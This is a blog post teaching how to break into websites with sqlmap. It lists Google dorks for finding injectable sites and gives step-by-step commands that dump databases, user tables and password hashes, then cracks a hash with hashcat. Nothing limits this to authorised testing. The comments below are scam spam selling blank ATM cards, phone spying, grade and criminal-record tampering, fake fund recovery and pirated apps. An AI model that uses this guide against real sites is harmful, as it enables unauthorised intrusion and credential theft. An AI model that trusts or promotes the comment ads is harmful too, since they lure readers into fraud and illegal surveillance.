Hi Friends Today I Will Explain Sqlmap Techniques For Hack Website But First You Know What Is Sqlmap..
So Lets Start Basic Of Sqlmap..
What
is SQLMAP
Sqlmap is an open source penetration
testing tool that automates the process of detecting and exploiting SQL
injection flaws and taking over of database servers. It comes with a powerful
detection engine, many niche features for the ultimate penetration tester and a
broad range of switches lasting from database fingerprinting, over data
fetching from the database, to accessing the underlying file system and
executing commands on the operating system via out-of-band connections.
Step 1: Find a Vulnerable Website
This is usually the toughest bit and takes longer than any other steps. Those who know how to use Google Dorks knows this already, but in case you don’t I have put together a number of strings that you can search in Google. Just copy paste any of the lines in Google and Google will show you a number of search results.
Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website
This list a really long.. Took me a long time to collect them. If you know SQL, then you can add more here.. Put them in comment section and I will add them here.
Google
Dork string Column 1
|
Google
Dork string Column 2
|
Google
Dork string Column 3
|
inurl:item_id=
|
inurl:review.php?id=
|
inurl:hosting_info.php?id=
|
inurl:newsid=
|
inurl:iniziativa.php?in=
|
inurl:gallery.php?id=
|
inurl:trainers.php?id=
|
inurl:curriculum.php?id=
|
inurl:rub.php?idr=
|
inurl:news-full.php?id=
|
inurl:labels.php?id=
|
inurl:view_faq.php?id=
|
inurl:news_display.php?getid=
|
inurl:story.php?id=
|
inurl:artikelinfo.php?id=
|
inurl:index2.php?option=
|
inurl:look.php?ID=
|
inurl:detail.php?ID=
|
inurl:readnews.php?id=
|
inurl:newsone.php?id=
|
inurl:index.php?=
|
inurl:top10.php?cat=
|
inurl:aboutbook.php?id=
|
inurl:profile_view.php?id=
|
inurl:newsone.php?id=
|
inurl:material.php?id=
|
inurl:category.php?id=
|
inurl:event.php?id=
|
inurl:opinions.php?id=
|
inurl:publications.php?id=
|
inurl:product-item.php?id=
|
inurl:announce.php?id=
|
inurl:fellows.php?id=
|
inurl:sql.php?id=
|
inurl:rub.php?idr=
|
inurl:downloads_info.php?id=
|
inurl:index.php?catid=
|
inurl:galeri_info.php?l=
|
inurl:prod_info.php?id=
|
inurl:news.php?catid=
|
inurl:tekst.php?idt=
|
inurl:shop.php?do=part&id=
|
inurl:index.php?id=
|
inurl:newscat.php?id=
|
inurl:productinfo.php?id=
|
inurl:news.php?id=
|
inurl:newsticker_info.php?idn=
|
inurl:collectionitem.php?id=
|
inurl:index.php?id=
|
inurl:rubrika.php?idr=
|
inurl:band_info.php?id=
|
inurl:trainers.php?id=
|
inurl:rubp.php?idr=
|
inurl:product.php?id=
|
inurl:buy.php?category=
|
inurl:offer.php?idf=
|
inurl:releases.php?id=
|
inurl:article.php?ID=
|
inurl:art.php?idm=
|
inurl:ray.php?id=
|
inurl:play_old.php?id=
|
inurl:title.php?id=
|
inurl:produit.php?id=
|
inurl:declaration_more.php?decl_id=
|
inurl:news_view.php?id=
|
inurl:pop.php?id=
|
inurl:pageid=
|
inurl:select_biblio.php?id=
|
inurl:shopping.php?id=
|
inurl:games.php?id=
|
inurl:humor.php?id=
|
inurl:productdetail.php?id=
|
inurl:page.php?file=
|
inurl:aboutbook.php?id=
|
inurl:post.php?id=
|
inurl:newsDetail.php?id=
|
inurl:ogl_inet.php?ogl_id=
|
inurl:viewshowdetail.php?id=
|
inurl:gallery.php?id=
|
inurl:fiche_spectacle.php?id=
|
inurl:clubpage.php?id=
|
inurl:article.php?id=
|
inurl:communique_detail.php?id=
|
inurl:memberInfo.php?id=
|
inurl:show.php?id=
|
inurl:sem.php3?id=
|
inurl:section.php?id=
|
inurl:staff_id=
|
inurl:kategorie.php4?id=
|
inurl:theme.php?id=
|
inurl:newsitem.php?num=
|
inurl:news.php?id=
|
inurl:page.php?id=
|
inurl:readnews.php?id=
|
inurl:index.php?id=
|
inurl:shredder-categories.php?id=
|
inurl:top10.php?cat=
|
inurl:faq2.php?id=
|
inurl:tradeCategory.php?id=
|
inurl:historialeer.php?num=
|
inurl:show_an.php?id=
|
inurl:product_ranges_view.php?ID=
|
inurl:reagir.php?num=
|
inurl:preview.php?id=
|
inurl:shop_category.php?id=
|
inurl:Stray-Questions-View.php?num=
|
inurl:loadpsb.php?id=
|
inurl:transcript.php?id=
|
inurl:forum_bds.php?num=
|
inurl:opinions.php?id=
|
inurl:channel_id=
|
inurl:game.php?id=
|
inurl:spr.php?id=
|
inurl:aboutbook.php?id=
|
inurl:view_product.php?id=
|
inurl:pages.php?id=
|
inurl:preview.php?id=
|
inurl:newsone.php?id=
|
inurl:announce.php?id=
|
inurl:loadpsb.php?id=
|
inurl:sw_comment.php?id=
|
inurl:clanek.php4?id=
|
inurl:pages.php?id=
|
inurl:news.php?id=
|
inurl:participant.php?id=
|
|
inurl:avd_start.php?avd=
|
inurl:download.php?id=
|
|
inurl:event.php?id=
|
inurl:main.php?id=
|
|
inurl:product-item.php?id=
|
inurl:review.php?id=
|
|
inurl:sql.php?id=
|
inurl:chappies.php?id=
|
|
inurl:material.php?id=
|
inurl:read.php?id=
|
|
inurl:clanek.php4?id=
|
inurl:prod_detail.php?id=
|
|
inurl:announce.php?id=
|
inurl:viewphoto.php?id=
|
|
inurl:chappies.php?id=
|
inurl:article.php?id=
|
|
inurl:read.php?id=
|
inurl:person.php?id=
|
|
inurl:viewapp.php?id=
|
inurl:productinfo.php?id=
|
|
inurl:viewphoto.php?id=
|
inurl:showimg.php?id=
|
|
inurl:rub.php?idr=
|
inurl:view.php?id=
|
|
inurl:galeri_info.php?l=
|
inurl:website.php?id=
|
Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection
For every string show above, you will get huundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection. There’s multiple ways and I am sure people would argue which one is best but to me the following is the simplest and most conclusive.
Let’s say you searched using this string
inurl:item_id= and one of
the search result shows a website like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15
Just add a single mark
'
at the end of the URL. (Just to ensure, " is
a double mark and '
is a single mark).So now your URL will become like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'
If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirect you to a different page, move on to the next site in your Google search results page.
See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons.
Examples of SQLi Errors from Different Databases and
Languages
Microsoft SQL Server
Server Error in ‘/’ Application.
Unclosed
mark before the character string ‘attack;’.
Description: An unhanded exception
occurred during the execution of the current web request. Please review the
stack trace for more information about the error where it originated in the
code.
Exception Details:
System.Data.SqlClient.SqlException: Unclosed
mark before the character string ‘attack;’.
MySQL Errors
Warning: mysql_fetch_array():
supplied argument is not a valid MySQL result resource in
/var/www/myawesomestore.com/buystuff.php on line 12
Error: You have an error in your SQL
syntax: check the manual that corresponds to your MySQL server version for the
right syntax to use near ‘’’ at line 12
Oracle Errors
java.sql.SQLException: ORA-00933:
SQL command not properly ended at
oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at
oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
Error:
SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly
terminated
PostgreSQL Errors
Query failed: ERROR: unterminated
quoted string at or near “‘’’”
Step 2: List DBMS databases using SQLMAP SQL Injection
As you can see from the screenshot
above, I’ve found a SQLMAP SQL Injection vulnerable website. Now I need to list
all the databases in that Vulnerable database. (this is also called enumerating
number of columns). As I am using SQLMAP, it will also tell me which one is
vulnerable.
Run the following command on your
vulnerable website with.
sqlmap -u
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs
In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”)
--dbs = Enumerate DBMS databases
See screenshot below.
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'
So, we now have two database that we can look into.
information_schema
is a standard database for almost every MYSQL database. So our
interest would be on sqldummywebsite database.Step 3: List tables of target database using SQLMAP SQL Injection
Now we need to know how many tables thissqldummywebsite
database got and what are their names. To find out that
information, use the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables
Sweet, this database got 8 tables.
[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info
and of course we want to check whats inside
user_info table using SQLMAP
SQL Injection as that table probably contains username and passwords.Step 4: List columns on target table of selected database using SQLMAP SQL Injection
Now we need to list all the columns on target tableuser_info of
sqldummywebsite
database using SQLMAP SQL Injection. SQLMAP SQL Injection makes
it really easy, run the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns
This returns 5 entries from target table
user_info of sqldummywebsite database.
[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)
AHA! This is exactly what we are looking for … target table
user_login and
user_password
.
Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection
SQLMAP SQL Injection makes is Easy! Just run the following command again:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump
Guess what, we now have the username from the database:
[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes
Almost there, we now only need the password to for
this user.. Next shows just that..
Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection
You’re probably getting used to on how to use SQLMAP SQL Injection tool. Use the following command to extract password for the user.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump
TADA!! We have password.
[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+
That is exactly right. This is a hashed password. What that means, the password is encrypted and now we need to decrypt it.
Step 7: Cracking password
So the hashed password is24iYBc17xK0e. .
How do you know what type of hash is that?Step 7.a: Identify Hash type
Luckily, Kali Linux provides a nice tool and we can use that to identify which type of hash is this. In command line type in the following command and on prompt paste the hash value:hash-identifier
Step 7.b: Crack HASH using cudahashcat
First of all I need to know which code to use for DES hashes. So let’s check that:
cudahashcat --help | grep DES
I am running a Computer thats got NVIDIA Graphics card. That means I will be using cudaHashcat. On my laptop, I got an AMD ATI Graphics cards, so I will be using oclHashcat on my laptop.
If you’re on VirtualBox or VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali in either a persisitent USB or in Hard Disk. Instructions are in the website, search around.
I saved the hash value
24iYBc17xK0e. in
DES.hash file. Following
is the command I am running:cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt
Howeverm both cudaHashcat and oclHashcat found and cracked the key.
Anyhow, so here’s the cracked password: abc123.
24iYBc17xK0e.:abc123
So We Have Successfully Hack The Website...
My ex ruined me broke due to his incessant extravagant spending , I found myself in a big mess. I talked to a loan company and I was told that they can't lend me loan . I was devastated, that's put me into a lot of debt. I looked online and came across Mr Oscar White of oscarwhitehackersworld@gmail.com , I hit him up and to my greatest surprise, my debt was paid in 4 working days from Oscar White blank atm card which i used to withdraw money untraceable and shop online with the blank atm card . I was so amazed and it didn't cost me too much to get the card and today have made up to $50,000.I implore you to contact him on how to get yours and because rich like me @ oscarwhitehackersworld@gmail.com or whats-app +1(323)-362-2310.No doubt he's the best out there and your problems will be solved!
ReplyDeleteHaven't you heard about cyber hacking company blank ATM card and how other people had benefited from it? I am Williams vivian by name, i want to share a blog and forums on how to get real blank ATM card,thank to cyber hacking company who helped me with an already hacked ATM CARD and i was so poor without funds that i got frustrated. One morning as i was browsing on the internet, i saw different comments of people testifying of how cyber hacking company helped him from being poor to a rich man through this already hacked ATM CARD. I was skeptical if this was true, i decided to contact him to know if he is real he proved to me beyond all doubts that its was really for real so i urgently receive my blank ATM card. Contact his email cyberhackingcompany@gmail.com and today am also testifying on how cyber hacking company helped me. I never believed in it until the card was sent to me, which am using today Contact the company now and become rich. Email: cyberhackingcompany@gmail.com
ReplyDeleteWelcome. BE NOT TROUBLED anymore. you’re at the right place. Nothing like having trustworthy hackers. have you lost money before or bitcoins and are looking for a hacker to get your money back? You should contact us right away. It's very affordable and we give guarantees to our clients. Our hacking services are as follows:Email:Creditcards.atm@gmail.com
ReplyDelete-hack into any kind of phone
_Increase Credit Scores
_western union, bitcoin and money gram hacking
_criminal records deletion_BLANK ATM/CREDIT CARDS
_Hacking of phones(that of your spouse, boss, friends, and see whatever is being discussed behind your back)
_Security system hacking...and so much more. Contact THEM now and get whatever you want at
Email:Creditcards.atm@gmail.com
Whats app:+1(305) 330-3282
WHY WOULD YOU NEED TO HIRE A HACKER??:
There are so many Reasons why people need to hire a hacker, It might be to Hack a Websites to deface information, retrieve information, edit information or give you admin access.
• Some people might need us To Hack Their Target Smartphone so that they could get access to all activities on the phone like , text messages , call logs , Social media Apps and other information
• Some might need to Hack a Facebook , gmail, Instagram , twitter and other social media Accounts,
• Also Some Individuals might want to Track someone else's Location probably for investigation cases
• Some might need Us to Hack into Court's Database to Clear criminal records.
• However, Some People Might Have Lost So Much Funds With BINARY OPTIONS BROKERS or BTC MINING and wish to Recover Their Funds
• All these Are what we can get Done Asap With The Help Of Our Root Hack Tools, Special Hack Tools and Our Technical Hacking Strategies Which Surpasses All Other Hackers.
★ OUR SPECIAL SERVICES WE OFFER ARE:
* RECOVERY OF LOST FUNDS ON BINARY OPTIONS
* Credit Cards Loading ( USA Only )
* BANK Account Loading (USA Banks Only)
★ You can also contact us for other Cyber Attacks And Hijackings, we do All ★
★ CONTACTS:
* For Binary Options Recovery,feel free to contact (Creditcards.atm@gmail.com)for a wonderful job well done,stay safe.
Why waste your time waiting for a monthly salary. When you can make up to $3,000 in 5-7days from home,
Invest $300 and earn $3,000
Invest $500 and earn $5,000
Invest $600 and earn $6,000
Invest $700 and earn $7,000
Invest $800 and earn $8,000
Invest $900 and earn $9,000
Invest $1000 and earn $10,000
IT HAS BEEN TESTED AND TRUSTED
Are you desperately in need of a hacker in any area of your life??? then you can contact; ( www.hackintechnology.com services like; -hack into your cheating partner's phone(whatsapp,bbm.gmail,icloud,facebook, twitter,snap chat and others) -Sales of Blank ATM cards. -hack into email accounts and trace email location -all social media accounts, -school database to clear or change grades, -Retrieval of lost file/documents -DUIs -company records and systems, -Bank accounts,Paypal accounts -Credit cards hacker -Credit score hack -Monitor any phone and email address -Websites hacking, pentesting. -IP addresses and people tracking. -Hacking courses and classes CONTACT THEM= hackintechnologyatgmaildotcom or whatsapp +12132951376 their services are the best on the market and 100% security and discreet work is guarante
ReplyDelete
ReplyDeleteCool way to have financial freedom!!! Are you tired of living a poor life, here is the opportunity you have been waiting for. Get the new ATM BLANK CARD that can hack any ATM MACHINE and withdraw money from any account. You do not require anybody’s account number before you can use it. Although you and I knows that its illegal,there is no risk using it. It has SPECIAL FEATURES, that makes the machine unable to detect this very card,and its transaction can’t be traced .You can use it anywhere in the world. With this card,you can withdraw nothing less than $4,500 a day. So to get the card,reach the hackers via email address : besthackersworld58@gmail.com or whatsapp him on +1(323)-723-2568
CONTACT: onlineghosthacker247 @gmail. com
ReplyDelete-Find Out If Your Husband/Wife or Boyfriend/Girlfriend Is Cheating On You
-Let them Help You Hack Any Website Or Database
-Hack Into Any University Portal; To Change Your Grades Or Upgrade Any Personal Information/Examination Questions
-Hack Email; Mobile Phones; Whatsapp; Text Messages; Call Logs; Facebook And Other Social Media Accounts
-And All Related Services
- let them help you in recovery any lost fund scam from you
onlineghosthacker Will Get The Job Done For You
onlineghosthacker247 @gmail. com
TESTED AND TRUSTED!
ReplyDeleteIf you ever want to change or up your university grades contact cybergolden hacker he'll get it done and show a proof of work done before payment. He's efficient, reliable and affordable. He can also perform all sorts of hacks including text, whatsapp, password decrypt,hack any mobile phone, Escape Bancruptcy, Delete Criminal Records and the rest
Email: cybergoldenhacker at gmail dot com
Very Nice Post, I learned a lot through it. Thanks for posting. Thank you!! For sharing this amazing article with details.
ReplyDeleteI bookmarked your site for the further update.
Here My website to
Pornhub MOD APK modyolo
Hotstar Mod Apk VIP + Premium 2022 March Latest
Momix Premium Mod APK Latest mod DOWNLOAD
Resso Premium Mod Apk Mix root mods
evergreen class 9 science social maths pdf DOWNLOAD
the kashmir files movie DOWNLOAD
atgflix
apksafe
technical sagar hacking course free download
Class 12th RS Aggarwal FREE Pdf Download
IS IT POSSIBLE TO ACTUALLY GET BACK FUNDS LOST TO CRYPTOCURRENCY SCAM? ABSOLUTELY YES! BUT, YOU MUST CONTACT THE RIGHT AGENCY TO ACHIEVE THIS.
ReplyDeleteDARK WEB ONLINE HACKERS is a financial regulator, private investigation and funds recovery body. We specialize in cases concerning cryptocurrency, FAKE investment schemes and recovery scam.
Visit darkwebonlinehackers.com now to report your case or contact our support team via the contact information below to get started.
dwchzone@gmail.com
WhatsApp: +1 (803) 392-1735
Stay Safe !